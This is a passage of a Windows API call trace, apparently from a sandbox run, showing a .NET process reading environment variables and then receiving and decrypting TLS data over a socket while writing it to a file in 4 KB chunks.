lpBuffer="À\x05恰\x12⹥敮ㅴ〦ؑ⬊ĆĄ㞂Њ㄂ȃ\x01ᄰਆثЁ舁਷̱̄Ăꀁނゼނジނڕ⬊ĆĄ㞂̊ġ!舄與舰縇舰ᨃĂȀā舰ဃ㘰င㨏✅䋒ⷞ軉ﱜ ꞔ푔큆벹౲똹玫⥼姉⿘㙸럩磅틆㺙\x05㘰င쭨끂㹷໵⧅ 羦ꧢ隯땼ﶿ迚딚볪咢ϱ劖ﵷꍋ✾螡\x05㘰ငᚑ褛ᅋ쵾埂赢悴ӌ 월핺ᤎ鴻ꉵ툡㍠ᜉ琕碮昬ꛛꙄハ쁵偿\x05㘰င晴菔䣱ꡈ鮦렘촅㪻 㐆ꦌ缍易瘌鶫⋨驻䊴됪㻸蚛것?锷\x05㘰င㮘☓뜵ᷩ杊삀榒 뵠痭ﷅ逑혐⾃?㧼猴ꃗ擎훻ꮍ鮢௽簯\x05㘰င⎨ꊴ老뒾쩠喹䷂ⅾ ?R烄놛ᆪ퍶䅔껴៖宧滓毮쫵\x05㘰င芨㱺ⶽ힇떃肛졢驾 蠥㬥䆚⑒괔ꯃី㮿ಪ౺搙佩广쓿悹\x05㘰င涭␛㄁豪␳ ㇖䚲") returned 0x0 [0087.246] CoTaskMemFree (pv=0x127898) [0087.246] CoTaskMemAlloc (cb=0x210) returned 0x127898 [0087.246] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.SslStream_MinCount", lpBuffer=0x127898, nSize=0x106 | out: lpBuffer="À\x05恰\x12⹥敮ㅴ〦ؑ⬊ĆĄ㞂Њ㄂ȃ\x01ᄰਆثЁ舁਷̱̄Ăꀁނゼނジނڕ⬊ĆĄ㞂̊ġ!舄與舰縇舰ᨃĂȀā舰ဃ㘰င㨏✅䋒ⷞ軉ﱜ ꞔ푔큆벹౲똹玫⥼姉⿘㙸럩磅틆㺙\x05㘰င쭨끂㹷໵⧅ 羦ꧢ隯땼ﶿ迚딚볪咢ϱ劖ﵷꍋ✾螡\x05㘰ငᚑ褛ᅋ쵾埂赢悴ӌ 월핺ᤎ鴻ꉵ툡㍠ᜉ琕碮昬ꛛꙄハ쁵偿\x05㘰င晴菔䣱ꡈ鮦렘촅㪻 㐆ꦌ缍易瘌鶫⋨驻䊴됪㻸蚛것?锷\x05㘰င㮘☓뜵ᷩ杊삀榒 뵠痭ﷅ逑혐⾃?㧼猴ꃗ擎훻ꮍ鮢௽簯\x05㘰င⎨ꊴ老뒾쩠喹䷂ⅾ ?R烄놛ᆪ퍶䅔껴៖宧滓毮쫵\x05㘰င芨㱺ⶽ힇떃肛졢驾 蠥㬥䆚⑒괔ꯃី㮿ಪ౺搙佩广쓿悹\x05㘰င涭␛㄁豪␳ ㇖䚲簂") returned 0x0 [0087.247] CoTaskMemFree (pv=0x127898) [0087.247] CoTaskMemAlloc (cb=0x210) returned 0x127898 [0087.247] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.SslStream_Disabled", lpBuffer=0x127898, nSize=0x106 | out: lpBuffer="À\x05恰\x12⹥敮ㅴ〦ؑ⬊ĆĄ㞂Њ㄂ȃ\x01ᄰਆثЁ舁਷̱̄Ăꀁނゼނジނڕ⬊ĆĄ㞂̊ġ!舄與舰縇舰ᨃĂȀā舰ဃ㘰င㨏✅䋒ⷞ軉ﱜ ꞔ푔큆벹౲똹玫⥼姉⿘㙸럩磅틆㺙\x05㘰င쭨끂㹷໵⧅ 羦ꧢ隯땼ﶿ迚딚볪咢ϱ劖ﵷꍋ✾螡\x05㘰ငᚑ褛ᅋ쵾埂赢悴ӌ 월핺ᤎ鴻ꉵ툡㍠ᜉ琕碮昬ꛛꙄハ쁵偿\x05㘰င晴菔䣱ꡈ鮦렘촅㪻 㐆ꦌ缍易瘌鶫⋨驻䊴됪㻸蚛것?锷\x05㘰င㮘☓뜵ᷩ杊삀榒 뵠痭ﷅ逑혐⾃?㧼猴ꃗ擎훻ꮍ鮢௽簯\x05㘰င⎨ꊴ老뒾쩠喹䷂ⅾ ?R烄놛ᆪ퍶䅔껴៖宧滓毮쫵\x05㘰င芨㱺ⶽ힇떃肛졢驾 蠥㬥䆚⑒괔ꯃី㮿ಪ౺搙佩广쓿悹\x05㘰င涭␛㄁豪␳ ㇖䚲簂") returned 0x0 [0087.247] CoTaskMemFree (pv=0x127898) [0087.247] CoTaskMemAlloc (cb=0x210) returned 0x127898 [0087.247] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.SslStream_MinCount", lpBuffer=0x127898, nSize=0x106 | out: lpBuffer="À\x05恰\x12⹥敮ㅴ〦ؑ⬊ĆĄ㞂Њ㄂ȃ\x01ᄰਆثЁ舁਷̱̄Ăꀁނゼނジނڕ⬊ĆĄ㞂̊ġ!舄與舰縇舰ᨃĂȀā舰ဃ㘰င㨏✅䋒ⷞ軉ﱜ ꞔ푔큆벹౲똹玫⥼姉⿘㙸럩磅틆㺙\x05㘰င쭨끂㹷໵⧅ 羦ꧢ隯땼ﶿ迚딚볪咢ϱ劖ﵷꍋ✾螡\x05㘰ငᚑ褛ᅋ쵾埂赢悴ӌ 월핺ᤎ鴻ꉵ툡㍠ᜉ琕碮昬ꛛꙄハ쁵偿\x05㘰င晴菔䣱ꡈ鮦렘촅㪻 㐆ꦌ缍易瘌鶫⋨驻䊴됪㻸蚛것?锷\x05㘰င㮘☓뜵ᷩ杊삀榒 뵠痭ﷅ逑혐⾃?㧼猴ꃗ擎훻ꮍ鮢௽簯\x05㘰င⎨ꊴ老뒾쩠喹䷂ⅾ ?R烄놛ᆪ퍶䅔껴៖宧滓毮쫵\x05㘰င芨㱺ⶽ힇떃肛졢驾 蠥㬥䆚⑒괔ꯃី㮿ಪ౺搙佩广쓿悹\x05㘰င涭␛㄁豪␳ ㇖䚲簂") returned 0x0 [0087.247] CoTaskMemFree (pv=0x127898) [0087.248] GetProcAddress (hModule=0x6f3e0000, lpProcName="EncryptMessage") returned 0x74455ca0 [0087.248] EncryptMessage (in: phContext=0x376c308, fQOP=0x0, pMessage=0x3775be8, MessageSeqNo=0x0 | out: pMessage=0x3775be8) returned 0x0 [0087.250] send (s=0x5d4, buf=0x37746c0*, len=202, flags=0) returned 202 [0087.251] GetProcAddress (hModule=0x754f0000, lpProcName="setsockopt") returned 0x754ffd70 [0087.251] setsockopt (s=0x5d4, level=65535, optname=4102, optval=" \x86\x01", optlen=4) returned 0 [0087.253] recv (in: s=0x5d4, buf=0x3781ef8, len=5, flags=0 | out: buf=0x3781ef8*) returned 5 [0087.429] recv (in: s=0x5d4, buf=0x3781efd, len=1392, flags=0 | out: buf=0x3781efd*) returned 1392 [0087.430] GetProcAddress (hModule=0x6f3e0000, lpProcName="DecryptMessage") returned 0x74455d10 [0087.430] DecryptMessage (in: phContext=0x376c308, pMessage=0x3785fb8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x3785fb8, pfQOP=0x0) returned 0x0 [0087.440] setsockopt (s=0x5d4, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0 [0087.440] recv (in: s=0x5d4, buf=0x3781ef8, len=5, flags=0 | out: buf=0x3781ef8*) returned 5 [0087.440] recv (in: s=0x5d4, buf=0x3781efd, len=1392, flags=0 | out: buf=0x3781efd*) returned 1392 [0087.441] DecryptMessage (in: phContext=0x376c308, pMessage=0x3799ae4, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x3799ae4, pfQOP=0x0) returned 0x0 [0087.441] recv (in: s=0x5d4, buf=0x3781ef8, len=5, flags=0 | out: buf=0x3781ef8*) returned 5 [0087.441] recv (in: s=0x5d4, buf=0x3781efd, len=1392, flags=0 | out: buf=0x3781efd*) returned 1392 [0087.441] DecryptMessage (in: phContext=0x376c308, pMessage=0x3799bf8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x3799bf8, pfQOP=0x0) returned 0x0 [0087.441] recv (in: s=0x5d4, buf=0x3781ef8, len=5, flags=0 | out: buf=0x3781ef8*) returned 5 [0087.441] recv (in: s=0x5d4, buf=0x3781efd, len=1392, flags=0 | out: buf=0x3781efd*) returned 1392 [0087.442] DecryptMessage (in: phContext=0x376c308, pMessage=0x3799d0c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x3799d0c, pfQOP=0x0) returned 0x0 [0087.445] GetProcAddress (hModule=0x772d0000, lpProcName="WriteFile") returned 0x7733f180 [0087.445] WriteFile (in: hFile=0x41c, lpBuffer=0x3798a50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x3798a50*, lpNumberOfBytesWritten=0x13fed38*=0x1000, lpOverlapped=0x0) returned 1 [0087.446] recv (in: s=0x5d4, buf=0x3781ef8, len=5, flags=0 | out: buf=0x3781ef8*) returned 5 [0087.447] recv (in: s=0x5d4, buf=0x3781efd, len=1392, flags=0 | out: buf=0x3781efd*) returned 1392 [0087.447] DecryptMessage (in: phContext=0x376c308, pMessage=0x3799e20, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x3799e20, pfQOP=0x0) returned 0x0 [0087.447] recv (in: s=0x5d4, buf=0x3781ef8, len=5, flags=0 | out: buf=0x3781ef8*) returned 5 [0087.447] recv (in: s=0x5d4, buf=0x3781efd, len=1392, flags=0 | out: buf=0x3781efd*) returned 1392 [0087.447] DecryptMessage (in: phContext=0x376c308, pMessage=0x3799f34, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x3799f34, pfQOP=0x0) returned 0x0 [0087.447] recv (in: s=0x5d4, buf=0x3781ef8, len=5, flags=0 | out: buf=0x3781ef8*) returned 5 [0087.447] recv (in: s=0x5d4, buf=0x3781efd, len=1392, flags=0 | out: buf=0x3781efd*) returned 1392 [0087.447] DecryptMessage (in: phContext=0x376c308, pMessage=0x379a048, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x379a048, pfQOP=0x0) returned 0x0 [0087.447] WriteFile (in: hFile=0x41c, lpBuffer=0x3798a50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x3798a50*, lpNumberOfBytesWritten=0x13fed38*=0x1000, lpOverlapped=0x0) returned 1 [0087.447] recv (in: s=0x5d4, buf=0x3781ef8, len=5, flags=0 | out: buf=0x3781ef8*) returned 5 [0087.447] recv (in: s=0x5d4, buf=0x3781efd, len=1392, flags=0 | out: buf=0x3781efd*) returned 1392 [0087.448] DecryptMessage (in: phContext=0x376c308, pMessage=0x379a15c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x379a15c, pfQOP=0x0) returned 0x0 [0087.448] recv (in: s=0x5d4, buf=0x3781ef8, len=5, flags=0 | out: buf=0x3781ef8*) returned 5 [0087.448] recv (in: s=0x5d4, buf=0x3781efd, len=1392, flags=0 | out: buf=0x3781efd*) returned 1392 [0087.448] DecryptMessage (in: phContext=0x376c308, pMessage=0x379a270, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x379a270, pfQOP=0x0) returned 0x0 [0087.448] recv (in: s=0x5d4, buf=0x3781ef8, len=5, flags=0 | out: buf=0x3781ef8*) returned 5 [0087.448] recv (in: s=0x5d4, buf=0x3781efd, len=1392, flags=0 | out: buf=0x3781efd*) returned 1392 [0087.448] DecryptMessage (in: phContext=0x376c308, pMessage=0x379a384, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x379a384, pfQOP=0x0) returned 0x0 [0087.448] WriteFile (in: hFile=0x41c, lpBuffer=0x3798a50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x3798a50*, lpNumberOfBytesWritten=0x13fed38*=0x1000, lpOverlapped=0x0) returned 1 [0087.448] recv (in: s=0x5d4, buf=0x3781ef8, len=5, flags=0 | out: buf=0x3781ef8*) returned 5 [0087.448] recv (in: s=0x5d4, buf=0x3781efd, len=1392, flags=0 | out: buf=0x3781efd*) returned 1392 [0087.448] DecryptMessage (in: phContext=0x376c308, pMessage=0x379a498, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x379a498, pfQOP=0x0) returned 0x0 [0087.448] recv (in: s=0x5d4, buf=0x3781ef8, len=5, flags=0 | out: buf=0x3781ef8*) returned 5 [0087.448] recv (in: s=0x5d4, buf=0x3781efd, len=1392, flags=0 | out: buf=0x3781efd*) returned 1392 [0087.449] DecryptMessage (in: phContext=0x376c308, pMessage=0x379a5ac, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x379a5ac, pfQOP=0x0) returned 0x0 [0087.449] recv (in: s=0x5d4, buf=0x3781ef8, len=5, flags=0 | out: buf=0x3781ef8*) returned 5 [0087.449] recv (in: s=0x5d4, buf=0x3781efd, len=320, flags=0 | out: buf=0x3781efd*) returned 320 [0087.449] DecryptMessage (in: phContext=0x376c308, pMessage=0x379a6c0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x379a6c0, pfQOP=0x0) returned 0x0 [0087.449] recv (in: s=0x5d4, buf=0x3781ef8, len=5, flags=0 | out: buf=0x3781ef8*) returned 5 [0087.449] recv (in: s=0x5d4, buf=0x3781efd, len=1392, flags=0 | out: buf=0x3781efd*) returned 1392 [0087.449] DecryptMessage (in: phContext=0x376c308, pMessage=0x379a7d4, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x379a7d4, pfQOP=0x0) returned 0x0 [0087.449] WriteFile (in: hFile=0x41c, lpBuffer=0x3798a50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x3798a50*, lpNumberOfBytesWritten=0x13fed38*=0x1000, lpOverlapped=0x0) returned 1 [0087.449] recv (in: s=0x5d4, buf=0x3781ef8, len=5, flags=0 | out: buf=0x3781ef8*) returned 5 [0087.449] recv (in: s=0x5d4, buf=0x3781efd, len=1392, flags=0 | out: buf=0x3781efd*) returned 1392 [0087.449] DecryptMessage (in: phContext=0x376c308, pMessage=0x379a8e8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x379a8e8, pfQOP=0x0) returned 0x0 [0087.449] recv (in: s=0x5d4, buf=0x3781ef8, len=5, flags=0 | out: buf=0x3781ef8*) returned 5 [0087.449] recv (in: s=0x5d4, buf=0x3781efd, len=1392, flags=0 | out: buf=0x3781efd*) returned 1392 [0087.450] DecryptMessage (in: phContext=0x376c308, pMessage=0x379a9fc, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x379a9fc, pfQOP=0x0) returned 0x0 [0087.450] recv (in: s=0x5d4, buf=0x3781ef8, len=5, flags=0 | out: buf=0x3781ef8*) returned 5 [0087.450] recv (in: s=0x5d4, buf=0x3781efd, len=1392, flags=0 | out: buf=0x3781efd*) returned 1392 [0087.450] DecryptMessage (in: phContext=0x376c308, pMessage=0x379ab10, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x379ab10, pfQOP=0x0) returned 0x0 [0087.450] WriteFile (in: hFile=0x41c, lpBuffer=0x3798a50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x3798a50*, lpNumberOfBytesWritten=0x13fed38*=0x1000, lpOverlapped=0x0) returned 1 [0087.450] recv (in: s=0x5d4, buf=0x3781ef8, len=5, flags=0 | out: buf=0x3781ef8*) returned 5 [0087.450] recv (in: s=0x5d4, buf=0x3781efd, len=1392, flags=0 | out: buf=0x3781efd*) returned 1392 [0087.450] DecryptMessage (in: phContext=0x376c308, pMessage=0x379ac24, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x379ac24, pfQOP=0x0) returned 0x0 [0087.450] recv (in: s=0x5d4, buf=0x3781ef8, len=5, flags=0 | out: buf=0x3781ef8*) returned 5 [0087.450] recv (in: s=0x5d4, buf=0x3781efd, len=1392, flags=0 | out: buf=0x3781efd*) returned 1392 [0087.450] DecryptMessage (in: phContext=0x376c308, pMessage=0x379ad38, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x379ad38, pfQOP=0x0) returned 0x0 [0087.450] recv (in: s=0x5d4, buf=0x3781ef8, len=5, flags=0 | out: buf=0x3781ef8*) returned 5 [0087.451] recv (in: s=0x5d4, buf=0x3781efd, len=1392, flags=0 | out: buf=0x3781efd*) returned 1392 [0087.451] DecryptMessage (in: phContext=0x376c308, pMessage=0x379ae4c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x379ae4c, pfQOP=0x0) returned 0x0 [0087.451] WriteFile (in: hFile=0x41c, lpBuffer=0x3798a50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x3798a50*, lpNumberOfBytesWritten=0x13fed38*=0x1000, lpOverlapped=0x0) returned 1 [0087.451] recv (in: s=0x5d4, buf=0x3781ef8, len=5, flags=0 | out: buf=0x3781ef8*) returned 5 [0087.451] recv (in: s=0x5d4, buf=0x3781efd, len=1392, flags=0 | out: buf=0x3781efd*) returned 1392 [0087.451] DecryptMessage (in: phContext=0x376c308, pMessage=0x379af60, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x379af60, pfQOP=0x0) returned 0x0 [0087.451] recv (in: s=0x5d4, buf=0x3781ef8, len=5, flags=0 | out: buf=0x3781ef8*) returned 5 [0087.451] recv (in: s=0x5d4, buf=0x3781efd, len=1392, flags=0 | out: buf=0x3781efd*) returned 1392 [0087.451] DecryptMessage (in: phContext=0x376c308, pMessage=0x379b074, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x379b074, pfQOP=0x0) returned 0x0 [0087.451] recv (in: s=0x5d4, buf=0x3781ef8, len=5, flags=0 | out: buf=0x3781ef8*) returned 5 [0087.451] recv (in: s=0x5d4, buf=0x3781efd, len=1392, flags=0 | out: buf=0x3781efd*) returned 1392 [0087.451] DecryptMessage (in: phContext=0x376c308, pMessage=0x379b188, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x379b188, pfQOP=0x0) returned 0x0 [0087.451] WriteFile (in: hFile=0x41c, lpBuffer=0x3798a50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x3798a50*, lpNumberOfBytesWritten=0x13fed38*=0x1000, lpOverlapped=0x0) returned 1 [0087.452] recv (in: s=0x5d4, buf=0x3781ef8, len=5, flags=0 | out: buf=0x3781ef8*) returned 5 [0087.452] recv (in: s=0x5d4, buf=0x3781efd, len=1392, flags=0 | out: buf=0x3781efd*) returned 1392 [0087.452] DecryptMessage (in: phContext=0x376c308, pMessage=0x379b29c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x379b29c, pfQOP=0x0) returned 0x0 [0087.452] recv (in: s=0x5d4, buf=0x3781ef8, len=5, flags=0 | out: buf=0x3781ef8*) returned 5 [0087.452] recv (in: s=0x5d4, buf=0x3781efd, len=1360, flags=0 | out: buf=0x3781efd*) returned 1360 [0087.452] DecryptMessage (in: phContext=0x376c308, pMessage=0x379b3b0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x379b3b0, pfQOP=0x0) returned 0x0 [0087.452] recv (in: s=0x5d4, buf=0x3781ef8, len=5, flags=0 | out: buf=0x3781ef8*) returned 5 [0087.452] recv (in: s=0x5d4, buf=0x3781efd, len=1392, flags=0 | out: buf=0x3781efd*) returned 1392 [0087.452] DecryptMessage (in: phContext=0x376c308, pMessage=0x379b4c4, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x379b4c4, pfQOP=0x0) returned 0x0 [0087.452] WriteFile (in: hFile=0x41c, lpBuffer=0x3798a50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x3798a50*, lpNumberOfBytesWritten=0x13fed38*=0x1000, lpOverlapped=0x0) returned 1 [0087.452] recv (in: s=0x5d4, buf=0x3781ef8, len=5, flags=0 | out: buf=0x3781ef8*) returned 5 [0087.452] recv (in: s=0x5d4, buf=0x3781efd, len=1392, flags=0 | out: buf=0x3781efd*) returned 1392 [0087.453] DecryptMessage (in: phContext=0x376c308, pMessage=0x379b5d8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x379b5d8, pfQOP=0x0) returned 0x0 [0087.453] recv (in: s=0x5d4, buf=0x3781ef8, len=5, flags=0 | out: buf=0x3781ef8*) returned 5 [0087.453] recv (in: s=0x5d4, buf=0x3781efd, len=1392, flags=0 | out: buf=0x3781efd*) returned 1392 [0087.453] DecryptMessage (in: phContext=0x376c308, pMessage=0x379b6ec, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x379b6ec, pfQOP=0x0) returned 0x0 [0087.453] recv (in: s=0x5d4, buf=0x3781ef8, len=5, flags=0 | out: buf=0x3781ef8*) returned 5 [0087.453] recv (in: s=0x5d4, buf=0x3781efd, len=1392, flags=0 | out: buf=0x3781efd*) returned 1392 [0087.453] DecryptMessage (in: phContext=0x376c308, pMessage=0x379b800, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x379b800, pfQOP=0x0) returned 0x0 [0087.453] WriteFile (in: hFile=0x41c, lpBuffer=0x3798a50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x3798a50*, lpNumberOfBytesWritten=0x13fed38*=0x1000, lpOverlapped=0x0) returned 1 [0087.453] recv (in: s=0x5d4, buf=0x3781ef8, len=5, flags=0 | out: buf=0x3781ef8*) returned 5 [0087.453] recv (in: s=0x5d4, buf=0x3781efd, len=1392, flags=0 | out: buf=0x3781efd*) returned 1392 [0087.453] DecryptMessage (in: phContext=0x376c308, pMessage=0x379b914, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x379b914, pfQOP=0x0) returned 0x0 [0087.453] recv (in: s=0x5d4, buf=0x3781ef8, len=5, flags=0 | out: buf=0x3781ef8*) returned 5 [0087.454] recv (in: s=0x5d4, buf=0x3781efd, len=1392, flags=0 | out: buf=0x3781efd*) returned 1392 [0087.454] DecryptMessage (in: phContext=0x376c308, pMessage=0x379ba28, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x379ba28, pfQOP=0x0) returned 0x0 [0087.454] recv (in: s=0x5d4, buf=0x3781ef8, len=5, flags=0 | out: buf=0x3781ef8*) returned 5 [0087.454] recv (in: s=0x5d4, buf=0x3781efd, len=1392, flags=0 | out: buf=0x3781efd*) returned 1392 [0087.454] DecryptMessage (in: phContext=0x376c308, pMessage=0x379bb3c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x379bb3c, pfQOP=0x0) returned 0x0 [0087.454] WriteFile (in: hFile=0x41c, lpBuffer=0x3798a50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x3798a50*, lpNumberOfBytesWritten=0x13fed38*=0x1000, lpOverlapped=0x0) returned 1 [0087.454] recv (in: s=0x5d4, buf=0x3781ef8, len=5, flags=0 | out: buf=0x3781ef8*) returned 5 [0087.454] recv (in: s=0x5d4, buf=0x3781efd, len=1392, flags=0 | out: buf=0x3781efd*) returned 1392 [0087.454] DecryptMessage (in: phContext=0x376c308, pMessage=0x379bc50, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x379bc50, pfQOP=0x0) returned 0x0 [0087.454] recv (in: s=0x5d4, buf=0x3781ef8, len=5, flags=0 | out: buf=0x3781ef8*) returned 5 [0087.454] recv (in: s=0x5d4, buf=0x3781efd, len=1392, flags=0 | out: buf=0x3781efd*) returned 1392 [0087.454] DecryptMessage (in: phContext=0x376c308, pMessage=0x379bd64, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x379bd64, pfQOP=0x0) returned 0x0 [0087.454] recv (in: s=0x5d4, buf=0x3781ef8, len=5, flags=0 | out: buf=0x3781ef8*) returned 5 [0087.455] recv (in: s=0x5d4, buf=0x3781efd, len=1392, flags=0 | out: buf=0x3781efd*) returned 1392 [0087.455] DecryptMessage (in: phContext=0x376c308, pMessage=0x379be78, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x379be78, pfQOP=0x0) returned 0x0 [0087.455] WriteFile (in: hFile=0x41c, lpBuffer=0x3798a50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x3798a50*, lpNumberOfBytesWritten=0x13fed38*=0x1000, lpOverlapped=0x0) returned 1 [0087.455] recv (in: s=0x5d4, buf=0x3781ef8, len=5, flags=0 | out: buf=0x3781ef8*) returned 5 [0087.455] recv (in: s=0x5d4, buf=0x3781efd, len=1392, flags=0 | out: buf=0x3781efd*) returned 1392 [0087.455] DecryptMessage (in: phContext=0x376c308, pMessage=0x379bf8c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x379bf8c, pfQOP=0x0) returned 0x0 [0087.455] recv (in: s=0x5d4, buf=0x3781ef8, len=5, flags=0 | out: buf=0x3781ef8*) returned 5 [0087.455] recv (in: s=0x5d4, buf=0x3781efd, len=1392, flags=0 | out: buf=0x3781efd*) returned 1392 [0087.455] DecryptMessage (in: phContext=0x376c308, pMessage=0x379c0a0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x379c0a0, pfQOP=0x0) returned 0x0 [0087.455] recv (in: s=0x5d4, buf=0x3781ef8, len=5, flags=0 | out: buf=0x3781ef8*) returned 5 [0087.455] recv (in: s=0x5d4, buf=0x3781efd, len=1392, flags=0 | out: buf=0x3781efd*) returned 1392 [0087.456] DecryptMessage (in: phContext=0x376c308, pMessage=0x379c1b4, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x379c1b4, pfQOP=0x0) returned 0x0 [0087.456] WriteFile (in: hFile=0x41c, lpBuffer=0x3798a50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x3798a50*, lpNumberOfBytesWritten=0x13fed38*=0x1000, lpOverlapped=0x0) returned 1 [0087.456] recv (in: s=0x5d4, buf=0x3781ef8, len=5, flags=0 | out: buf=0x3781ef8*) returned 5 [0087.456] recv (in: s=0x5d4, buf=0x3781efd, len=1392, flags=0 | out: buf=0x3781efd*) returned 1392 [0087.456] DecryptMessage (in: phContext=0x376c308, pMessage=0x379c2c8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x379c2c8, pfQOP=0x0) returned 0x0 [0087.456] recv (in: s=0x5d4, buf=0x3781ef8, len=5, flags=0 | out: buf=0x3781ef8*) returned 5 [0087.456] recv (in: s=0x5d4, buf=0x3781efd, len=1392, flags=0 | out: buf=0x3781efd*) returned 1392 [0087.456] DecryptMessage (in: phContext=0x376c308, pMessage=0x379c3dc, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x379c3dc, pfQOP=0x0) returned 0x0 [0087.456] recv (in: s=0x5d4, buf=0x3781ef8, len=5, flags=0 | out: buf=0x3781ef8*) returned 5 [0087.456] recv (in: s=0x5d4, buf=0x3781efd, len=1392, flags=0 | out: buf=0x3781efd*) returned 1392 [0087.456] DecryptMessage (in: phContext=0x376c308, pMessage=0x379c4f0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x379c4f0, pfQOP=0x0) returned 0x0 [0087.456] WriteFile (in: hFile=0x41c, lpBuffer=0x3798a50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x3798a50*, lpNumberOfBytesWritten=0x13fed38*=0x1000, lpOverlapped=0x0) returned 1 [0087.458] recv (in: s=0x5d4, buf=0x3781ef8, len=5, flags=0 | out: buf=0x3781ef8*) returned 5 [0087.458] recv (in: s=0x5d4, buf=0x3781efd, len=4256, flags=0 | out: buf=0x3781efd*) returned 4256 [0087.459] DecryptMessage (in: phContext=0x376c308, pMessage=0x379c604, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x379c604, pfQOP=0x0) returned 0x0 [0087.462] WriteFile (in: hFile=0x41c, lpBuffer=0x3798a50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x3798a50*, lpNumberOfBytesWritten=0x13fed38*=0x1000, lpOverlapped=0x0) returned 1 [0087.467] recv (in: s=0x5d4, buf=0x3781ef8, len=5, flags=0 | out: buf=0x3781ef8*) returned 5 [0087.467] recv (in: s=0x5d4, buf=0x3781efd, len=4256, flags=0 | out: buf=0x3781efd*) returned 4256 [0087.467] DecryptMessage (in: phContext=0x376c308, pMessage=0x379c718, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x379c718, pfQOP=0x0) returned 0x0 [0087.467] WriteFile (in: hFile=0x41c, lpBuffer=0x3798a50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x3798a50*, lpNumberOfBytesWritten=0x13fed38*=0x1000, lpOverlapped=0x0) returned 1 [0087.468] recv (in: s=0x5d4, buf=0x3781ef8, len=5, flags=0 | out: buf=0x3781ef8*) returned 5 [0087.468] recv (in: s=0x5d4, buf=0x3781efd, len=2432, flags=0 | out: buf=0x3781efd*) returned 2432 [0087.468] DecryptMessage (in: phContext=0x376c308, pMessage=0x379c82c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x379c82c, pfQOP=0x0) returned 0x0 [0087.468] recv (in: s=0x5d4, 